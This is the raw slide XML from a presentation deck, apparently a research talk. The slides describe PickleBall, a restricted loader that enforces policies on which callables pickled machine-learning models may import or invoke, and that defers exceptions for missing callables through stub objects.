                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1285">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Restricted Loader</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Google Shape;1199;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452577" y="1992928"/>
            <a:ext cx="630600" cy="606300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19125">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91625" lIns="91625" spcFirstLastPara="1" rIns="91625" wrap="square" tIns="91625">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1402"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452577" y="1992927"/>
            <a:ext cx="630405" cy="606068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Google Shape;1201;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177425" y="3710825"/>
            <a:ext cx="1092000" cy="615000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Loading Policy</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1202" name="Google Shape;1202;p97"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320625" y="4018325"/>
            <a:ext cx="1590300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1203" name="Google Shape;1203;p97"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241800" y="2338825"/>
            <a:ext cx="1679100" cy="688800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1204" name="Google Shape;1204;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213671" y="1800712"/>
            <a:ext cx="563087" cy="525483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1205" name="Google Shape;1205;p97"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546349" y="3141134"/>
            <a:ext cx="688200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206" name="Google Shape;1206;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6221788" y="2252722"/>
            <a:ext cx="1092000" cy="603600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1543">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Loaded Model</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010175" y="1454725"/>
            <a:ext cx="1426500" cy="434700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Pickle Model</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516368" y="2980667"/>
            <a:ext cx="502800" cy="407400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1323">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr sz="1323">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6164559" y="3460128"/>
            <a:ext cx="1206300" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1543">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Security Exception</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1210" name="Google Shape;1210;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241800" y="5531050"/>
            <a:ext cx="3911100" cy="2955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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>PickleBall provides a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>drop-in replacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> for the pickle module. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Raises security exceptions when opcodes import or invoke disallowed callables.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>PickleBall loads policies </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>lazily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> to account for missing but unimportant callables. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>When a missing callable is imported, PickleBall creates a stub object and defers raising a security exception until the stub object is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>invoked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Intuition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>some attributes are added to the model as metadata after instantiation. If these are not used during deserialization or inference, they do not need to be instantiated.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211" name="Google Shape;1211;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357000" y="847219"/>
            <a:ext cx="3515400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Enforcement module is a modified Pickle Machine</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide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1215" name="Shape 1215"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p98"/>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1218" name="Google Shape;1218;p98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3902825" y="2252725"/>
            <a:ext cx="1590300" cy="2119500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8775">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="83975" lIns="83975" spcFirstLastPara="1" rIns="83975" wrap="square" tIns="83975">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1285">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1285">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
